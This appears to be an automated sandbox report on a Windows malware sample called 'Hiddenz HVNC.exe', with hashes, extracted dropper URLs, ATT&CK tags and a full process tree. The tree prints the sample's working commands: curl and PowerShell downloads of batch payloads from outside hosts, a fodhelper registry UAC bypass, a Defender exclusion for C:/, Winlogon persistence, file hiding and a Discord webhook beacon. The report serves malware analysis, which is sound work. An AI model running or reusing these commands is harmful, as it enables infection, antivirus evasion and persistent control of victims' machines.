1512b8c89e3a8017358fd48a259058024b4abca222535b25fd9d4abb8b71e3d6

Analysis

max time kernel
31s
max time network
34s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
25-09-2022 18:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Hiddenz HVNC.exe
Size

32.6MB
MD5

e734d35484b6a31d8ec313b6b5867188
SHA1

1dbafe2644f680fecfb6ae11cfb063a0a200f434
SHA256

dac9a647f0acd0fb94cbe345c03f6acd8408273d34926546b2252c5d494a8279
SHA512

0f69b8dce04739fcf94ba96aebc2a36936225e68e43142e954f45878f75278bb772252009f344796a35956cbc41925424e88a48bf7d2e0608ebfce9ab72f5ca4
SSDEEP

393216:Cw06SEFCxjJE5TXe/UqhbceBVse9ziNdYK0f52KPtOBdpxdue41gGAZrYsZXGdY5:Cx7blFrUB+euAZrY6XGI

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://rick-roll.fun/uwu/0303/Admin/cc.g

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://rick-roll.fun/uwu/0303/global/cc.g

Signatures

Executes dropped EXE 1 IoCs

Processes:

c.exe

pid process

4336 c.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Delays execution with timeout.exe 3 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exe

pid process

2556 timeout.exe
3688 timeout.exe
3196 timeout.exe
Runs ping.exe 1 TTPs 8 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid process

4300 PING.EXE
2172 PING.EXE
3280 PING.EXE
3516 PING.EXE
4728 PING.EXE
2548 PING.EXE
800 PING.EXE
2164 PING.EXE
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exe

pid process

1468 powershell.exe
1468 powershell.exe
2408 powershell.exe

pid	process
4336	c.exe

pid	process
2556	timeout.exe
3688	timeout.exe
3196	timeout.exe

pid	process
4300	PING.EXE
2172	PING.EXE
3280	PING.EXE
3516	PING.EXE
4728	PING.EXE
2548	PING.EXE
800	PING.EXE
2164	PING.EXE

pid	process
1468	powershell.exe
1468	powershell.exe
2408	powershell.exe

Suspicious use of AdjustPrivilegeToken 44 IoCs

Processes:

WMIC.exepowershell.exepowershell.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	4296	WMIC.exe
Token: SeSecurityPrivilege	4296	WMIC.exe
Token: SeTakeOwnershipPrivilege	4296	WMIC.exe
Token: SeLoadDriverPrivilege	4296	WMIC.exe
Token: SeSystemProfilePrivilege	4296	WMIC.exe
Token: SeSystemtimePrivilege	4296	WMIC.exe
Token: SeProfSingleProcessPrivilege	4296	WMIC.exe
Token: SeIncBasePriorityPrivilege	4296	WMIC.exe
Token: SeCreatePagefilePrivilege	4296	WMIC.exe
Token: SeBackupPrivilege	4296	WMIC.exe
Token: SeRestorePrivilege	4296	WMIC.exe
Token: SeShutdownPrivilege	4296	WMIC.exe
Token: SeDebugPrivilege	4296	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4296	WMIC.exe
Token: SeRemoteShutdownPrivilege	4296	WMIC.exe
Token: SeUndockPrivilege	4296	WMIC.exe
Token: SeManageVolumePrivilege	4296	WMIC.exe
Token: 33	4296	WMIC.exe
Token: 34	4296	WMIC.exe
Token: 35	4296	WMIC.exe
Token: 36	4296	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4296	WMIC.exe
Token: SeSecurityPrivilege	4296	WMIC.exe
Token: SeTakeOwnershipPrivilege	4296	WMIC.exe
Token: SeLoadDriverPrivilege	4296	WMIC.exe
Token: SeSystemProfilePrivilege	4296	WMIC.exe
Token: SeSystemtimePrivilege	4296	WMIC.exe
Token: SeProfSingleProcessPrivilege	4296	WMIC.exe
Token: SeIncBasePriorityPrivilege	4296	WMIC.exe
Token: SeCreatePagefilePrivilege	4296	WMIC.exe
Token: SeBackupPrivilege	4296	WMIC.exe
Token: SeRestorePrivilege	4296	WMIC.exe
Token: SeShutdownPrivilege	4296	WMIC.exe
Token: SeDebugPrivilege	4296	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4296	WMIC.exe
Token: SeRemoteShutdownPrivilege	4296	WMIC.exe
Token: SeUndockPrivilege	4296	WMIC.exe
Token: SeManageVolumePrivilege	4296	WMIC.exe
Token: 33	4296	WMIC.exe
Token: 34	4296	WMIC.exe
Token: 35	4296	WMIC.exe
Token: 36	4296	WMIC.exe
Token: SeDebugPrivilege	1468	powershell.exe
Token: SeDebugPrivilege	2408	powershell.exe

Suspicious use of WriteProcessMemory 21 IoCs

Processes:

Hiddenz HVNC.execmd.execmd.execmd.execmd.exepowershell.execmd.exe

description	pid	process	target process
PID 4248 wrote to memory of 4328	4248	Hiddenz HVNC.exe	cmd.exe
PID 4248 wrote to memory of 4328	4248	Hiddenz HVNC.exe	cmd.exe
PID 4328 wrote to memory of 4336	4328	cmd.exe	c.exe
PID 4328 wrote to memory of 4336	4328	cmd.exe	c.exe
PID 4328 wrote to memory of 4336	4328	cmd.exe	c.exe
PID 4328 wrote to memory of 5036	4328	cmd.exe	cmd.exe
PID 4328 wrote to memory of 5036	4328	cmd.exe	cmd.exe
PID 5036 wrote to memory of 4924	5036	cmd.exe	cmd.exe
PID 5036 wrote to memory of 4924	5036	cmd.exe	cmd.exe
PID 4924 wrote to memory of 4296	4924	cmd.exe	WMIC.exe
PID 4924 wrote to memory of 4296	4924	cmd.exe	WMIC.exe
PID 5036 wrote to memory of 4816	5036	cmd.exe	curl.exe
PID 5036 wrote to memory of 4816	5036	cmd.exe	curl.exe
PID 5036 wrote to memory of 1828	5036	cmd.exe	cmd.exe
PID 5036 wrote to memory of 1828	5036	cmd.exe	cmd.exe
PID 1828 wrote to memory of 1468	1828	cmd.exe	powershell.exe
PID 1828 wrote to memory of 1468	1828	cmd.exe	powershell.exe
PID 1468 wrote to memory of 4048	1468	powershell.exe	cmd.exe
PID 1468 wrote to memory of 4048	1468	powershell.exe	cmd.exe
PID 4048 wrote to memory of 2408	4048	cmd.exe	powershell.exe
PID 4048 wrote to memory of 2408	4048	cmd.exe	powershell.exe

Views/modifies file attributes 1 TTPs 5 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

4804 attrib.exe
384 attrib.exe
3900 attrib.exe
4708 attrib.exe
1592 attrib.exe

pid	process
4804	attrib.exe
384	attrib.exe
3900	attrib.exe
4708	attrib.exe
1592	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Hiddenz HVNC.exe
"C:\Users\Admin\AppData\Local\Temp\Hiddenz HVNC.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4248

C:\Windows\system32\cmd.exe
cmd.exe "/c start /max c.exe & cd %appdata% & start /min obf.bat"
2⤵
- Suspicious use of WriteProcessMemory
PID:4328

C:\Users\Admin\AppData\Local\Temp\c.exe
c.exe
3⤵
- Executes dropped EXE
PID:4336

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K obf.bat"
3⤵
- Suspicious use of WriteProcessMemory
PID:5036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize
4⤵
- Suspicious use of WriteProcessMemory
PID:4924

C:\Windows\System32\Wbem\WMIC.exe
wmic os get TotalVisibleMemorySize
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4296

C:\Windows\system32\curl.exe
curl http://rick-roll.fun/storug/uac.bat --output uac.bat
4⤵
PID:4816

C:\Windows\system32\cmd.exe
cmd.exe /min /c start /min powershell.exe -WindowStyle hidden -Command "Start-Process -FilePath C:\Users\Admin\AppData\Roaming\uac.bat -WindowStyle Hidden"
4⤵
- Suspicious use of WriteProcessMemory
PID:1828

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle hidden -Command "Start-Process -FilePath C:\Users\Admin\AppData\Roaming\uac.bat -WindowStyle Hidden"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\uac.bat" "
6⤵
- Suspicious use of WriteProcessMemory
PID:4048

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command " New-Item """HKCU:\Software\Classes\ms-settings\Shell\Open\command""" -Force "
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2408

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command " New-ItemProperty -Path """HKCU:\Software\Classes\ms-settings\Shell\Open\command""" -Name """DelegateExecute""" -Value """""" -Force "
7⤵
PID:2368

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle hidden -Command "Start-Process -FilePath C:\Users\Admin\AppData\Roaming\uwuw.bat -WindowStyle Hidden"
7⤵
PID:2532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\uwuw.bat" "
8⤵
PID:4024

C:\Windows\system32\timeout.exe
timeout -t 3
9⤵
- Delays execution with timeout.exe
PID:2556

C:\Windows\system32\fodhelper.exe
fodhelper.exe
9⤵
PID:4124

C:\Windows\system32\cmd.exe
"cmd.exe" /c start /min C:\Users\Admin\AppData\Roaming\wininit.bat & powershell.exe Add-MpPreference -ExclusionPath C:/
10⤵
PID:2176

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Roaming\wininit.bat
11⤵
PID:1256

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize
12⤵
PID:3596

C:\Windows\System32\Wbem\WMIC.exe
wmic os get TotalVisibleMemorySize
13⤵
PID:4932

C:\Windows\system32\curl.exe
curl http://rick-roll.fun/uwu/0303/infection/payload.bat --output pl.bat
12⤵
PID:3900

C:\Windows\system32\curl.exe
curl http://rick-roll.fun/storug/info.bat --output i.batstart /min cmd.exe /min /c start /min powershell.exe -WindowStyle hidden -Command "Start-Process -FilePath C:\Users\Admin\AppData\Roaming\cr\i.bat -WindowStyle Hidden"
12⤵
PID:4960

C:\Windows\system32\cmd.exe
cmd.exe /min /c start /min powershell.exe -WindowStyle hidden -Command "Start-Process -FilePath C:\Users\Admin\AppData\Roaming\cr\pl.bat -WindowStyle Hidden"
12⤵
PID:2968

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle hidden -Command "Start-Process -FilePath C:\Users\Admin\AppData\Roaming\cr\pl.bat -WindowStyle Hidden"
13⤵
PID:4468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\cr\pl.bat" "
14⤵
PID:1340

C:\Windows\system32\curl.exe
curl -X POST http://161.97.167.99/uwu/0303/folder.php -H "Content-Type: application/x-www-form-urlencoded" -d "name=Admin"
15⤵
PID:1124

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\t.vbs"
15⤵
PID:2812

C:\Windows\System32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /f /d "explorer.exe,cmd.exe /min /c start /min powershell.exe -WindowStyle hidden -Command """Start-Process -FilePath C:\Windows\System32\sys.bat -WindowStyle Hidden""""
15⤵
PID:404

C:\Windows\System32\timeout.exe
timeout -t 1
15⤵
- Delays execution with timeout.exe
PID:3196

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Windows\System32\sys.vbs"
15⤵
PID:4536

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process -FilePath C:\Windows\System32\sys.bat -WindowStyle Hidden"
16⤵
PID:1480

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Windows\System32\sys.bat" "
17⤵
PID:4496

C:\Windows\system32\attrib.exe
attrib -h -s /s
18⤵
- Views/modifies file attributes
PID:4804

C:\Windows\system32\curl.exe
curl -H "Content-Type: application/json" -d "{\"username\": \"UwU\", \"content\":\"`Admin` is online. :green_circle:\"}" https://discord.com/api/webhooks/985608299036672061/h1u7VWs2UKmPq8IOKEDtYkK-fm-GPa7Ry9zUht3GeEEhJ3iZ37DcPgV1gU5NZlGy5aCb
18⤵
PID:1744

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://rick-roll.fun/uwu/0303/Admin/cc.g', 'cc.bat')"
18⤵
PID:432

C:\Windows\system32\PING.EXE
ping 127.0.0.1 -n 1 -w 500
18⤵
- Runs ping.exe
PID:2172

C:\Windows\system32\PING.EXE
ping 127.0.0.1 -n 1 -w 500
18⤵
- Runs ping.exe
PID:3280

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://rick-roll.fun/uwu/0303/global/cc.g', 'cc.bat')"
18⤵
PID:2612

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://rick-roll.fun/uwu/0303/Admin/cc.g', 'cc.bat')"
18⤵
PID:2956

C:\Windows\system32\attrib.exe
attrib +h +s /s
18⤵
- Views/modifies file attributes
PID:384

C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t REG_DWORD /d 2 /f
18⤵
PID:564

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://rick-roll.fun/uwu/0303/global/cc.g', 'cc.bat')"
18⤵
PID:2648

C:\Windows\system32\PING.EXE
ping 127.0.0.1 -n 1 -w 500
18⤵
- Runs ping.exe
PID:3516

C:\Windows\system32\PING.EXE
ping 127.0.0.1 -n 1 -w 500
18⤵
- Runs ping.exe
PID:4728

C:\Windows\system32\attrib.exe
attrib +h +s /s
18⤵
- Views/modifies file attributes
PID:3900

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://rick-roll.fun/uwu/0303/Admin/cc.g', 'cc.bat')"
18⤵
PID:4884

C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t REG_DWORD /d 2 /f
18⤵
PID:1976

C:\Windows\system32\PING.EXE
ping 127.0.0.1 -n 1 -w 500
18⤵
- Runs ping.exe
PID:2548

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://rick-roll.fun/uwu/0303/global/cc.g', 'cc.bat')"
18⤵
PID:3576

C:\Windows\system32\PING.EXE
ping 127.0.0.1 -n 1 -w 500
18⤵
- Runs ping.exe
PID:800

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://rick-roll.fun/uwu/0303/Admin/cc.g', 'cc.bat')"
18⤵
PID:2260

C:\Windows\system32\attrib.exe
attrib +h +s /s
18⤵
- Views/modifies file attributes
PID:4708

C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t REG_DWORD /d 2 /f
18⤵
PID:2512

C:\Windows\system32\PING.EXE
ping 127.0.0.1 -n 1 -w 500
18⤵
- Runs ping.exe
PID:2164

C:\Windows\system32\PING.EXE
ping 127.0.0.1 -n 1 -w 500
18⤵
- Runs ping.exe
PID:4300

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://rick-roll.fun/uwu/0303/global/cc.g', 'cc.bat')"
18⤵
PID:3136

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://rick-roll.fun/uwu/0303/Admin/cc.g', 'cc.bat')"
18⤵
PID:4816

C:\Windows\system32\attrib.exe
attrib +h +s /s
18⤵
- Views/modifies file attributes
PID:1592

C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t REG_DWORD /d 2 /f
18⤵
PID:4036

C:\Windows\system32\cmd.exe
cmd.exe /min /c start /min powershell.exe -WindowStyle hidden -Command "Start-Process -FilePath C:\Users\Admin\AppData\Roaming\error.bat -WindowStyle Hidden"
12⤵
PID:456

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle hidden -Command "Start-Process -FilePath C:\Users\Admin\AppData\Roaming\error.bat -WindowStyle Hidden"
13⤵
PID:1952

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\error.bat" "
14⤵
PID:4024

C:\Windows\system32\timeout.exe
timeout -t 3
15⤵
- Delays execution with timeout.exe
PID:3688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath C:/
11⤵
PID:5116

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command " Set-ItemProperty -Path """HKCU:\Software\Classes\ms-settings\Shell\Open\command"" -Name """(default)""" -Value """cmd.exe /c start /min C:\Users\Admin\AppData\Roaming\wininit.bat & powershell.exe Add-MpPreference -ExclusionPath C:/""" -Force "
7⤵
PID:424

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command " Set-ItemProperty -Path """HKCU:\Software\Classes\ms-settings\Shell\Open\command"" -Name """(default)""" -Value """cmd.exe /c start /min C:\Users\Admin\AppData\Roaming\wininit.bat & powershell.exe Add-MpPreference -ExclusionPath C:/""" -Force "
7⤵
PID:1032

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command " Set-ItemProperty -Path """HKCU:\Software\Classes\ms-settings\Shell\Open\command"" -Name """(default)""" -Value """cmd.exe /c start /min C:\Users\Admin\AppData\Roaming\wininit.bat & powershell.exe Add-MpPreference -ExclusionPath C:/""" -Force "
7⤵
PID:1728

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command " Set-ItemProperty -Path """HKCU:\Software\Classes\ms-settings\Shell\Open\command"" -Name """(default)""" -Value """cmd.exe /c start /min C:\Users\Admin\AppData\Roaming\wininit.bat & powershell.exe Add-MpPreference -ExclusionPath C:/""" -Force "
7⤵
PID:2184

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command " Set-ItemProperty -Path """HKCU:\Software\Classes\ms-settings\Shell\Open\command"" -Name """(default)""" -Value """cmd.exe /c start /min C:\Users\Admin\AppData\Roaming\wininit.bat & powershell.exe Add-MpPreference -ExclusionPath C:/""" -Force "
7⤵
PID:2084

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command " Set-ItemProperty -Path """HKCU:\Software\Classes\ms-settings\Shell\Open\command"" -Name """(default)""" -Value """cmd.exe /c start /min C:\Users\Admin\AppData\Roaming\wininit.bat & powershell.exe Add-MpPreference -ExclusionPath C:/""" -Force "
7⤵
PID:4540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command " Set-ItemProperty -Path """HKCU:\Software\Classes\ms-settings\Shell\Open\command"" -Name """(default)""" -Value """cmd.exe /c start /min C:\Users\Admin\AppData\Roaming\wininit.bat & powershell.exe Add-MpPreference -ExclusionPath C:/""" -Force "
7⤵
PID:1448

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command " Set-ItemProperty -Path """HKCU:\Software\Classes\ms-settings\Shell\Open\command"" -Name """(default)""" -Value """cmd.exe /c start /min C:\Users\Admin\AppData\Roaming\wininit.bat & powershell.exe Add-MpPreference -ExclusionPath C:/""" -Force "
7⤵
PID:60

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command " Set-ItemProperty -Path """HKCU:\Software\Classes\ms-settings\Shell\Open\command"" -Name """(default)""" -Value """cmd.exe /c start /min C:\Users\Admin\AppData\Roaming\wininit.bat & powershell.exe Add-MpPreference -ExclusionPath C:/""" -Force "
7⤵
PID:3184

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command " Set-ItemProperty -Path """HKCU:\Software\Classes\ms-settings\Shell\Open\command"" -Name """(default)""" -Value """cmd.exe /c start /min C:\Users\Admin\AppData\Roaming\wininit.bat & powershell.exe Add-MpPreference -ExclusionPath C:/""" -Force "
7⤵
PID:2520

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command " Set-ItemProperty -Path """HKCU:\Software\Classes\ms-settings\Shell\Open\command"" -Name """(default)""" -Value """cmd.exe /c start /min C:\Users\Admin\AppData\Roaming\wininit.bat & powershell.exe Add-MpPreference -ExclusionPath C:/""" -Force "
7⤵
PID:4396

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command " Set-ItemProperty -Path """HKCU:\Software\Classes\ms-settings\Shell\Open\command"" -Name """(default)""" -Value """cmd.exe /c start /min C:\Users\Admin\AppData\Roaming\wininit.bat & powershell.exe Add-MpPreference -ExclusionPath C:/""" -Force "
7⤵
PID:4728

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command " Set-ItemProperty -Path """HKCU:\Software\Classes\ms-settings\Shell\Open\command"" -Name """(default)""" -Value """cmd.exe /c start /min C:\Users\Admin\AppData\Roaming\wininit.bat & powershell.exe Add-MpPreference -ExclusionPath C:/""" -Force "
7⤵
PID:3096

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command " Set-ItemProperty -Path """HKCU:\Software\Classes\ms-settings\Shell\Open\command"" -Name """(default)""" -Value """cmd.exe /c start /min C:\Users\Admin\AppData\Roaming\wininit.bat & powershell.exe Add-MpPreference -ExclusionPath C:/""" -Force "
7⤵
PID:1256

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command " Set-ItemProperty -Path """HKCU:\Software\Classes\ms-settings\Shell\Open\command"" -Name """(default)""" -Value """cmd.exe /c start /min C:\Users\Admin\AppData\Roaming\wininit.bat & powershell.exe Add-MpPreference -ExclusionPath C:/""" -Force "
7⤵
PID:1864

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Credential Access

Discovery

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
d8b9a260789a22d72263ef3bb119108c

SHA1
376a9bd48726f422679f2cd65003442c0b6f6dd5

SHA256
d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

SHA512
550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
2ad081b7830221ecc8e1c0e4500a0d7d

SHA1
255fa66a9cbca38f52939c0e7fc6ac73630224c5

SHA256
240019dd73fd6eeabc8ec488afa8ad119615e27112c1db273426512e847441a7

SHA512
1a5e5c25894c97e6af8468d7785148229e00d60a2be94b2b4a3a1d92ff47f52173cc968a12d586beb76df4e2ae5cf699297dd8aa7fb9ab94851b2afc8a1347c5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
9b194c7ce9dcf8c7e03f4dc78b0f06ca

SHA1
c6f304f2e25f26c13461d92c56c4cca8d2620933

SHA256
a085ebeaa7ba8166d5252ef5e222fa52bc1a735d07a47975e0725208835be1f9

SHA512
a114d775c58801577bf17e3da903c2dcf01422146ca420b6e56bd65358c1bda9fb7c135dd4d11e3e7180ca4649e78c75b2dd129a1a27b91d3937b13219f96033

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
96ff1ee586a153b4e7ce8661cabc0442

SHA1
140d4ff1840cb40601489f3826954386af612136

SHA256
0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

SHA512
3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
96ff1ee586a153b4e7ce8661cabc0442

SHA1
140d4ff1840cb40601489f3826954386af612136

SHA256
0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

SHA512
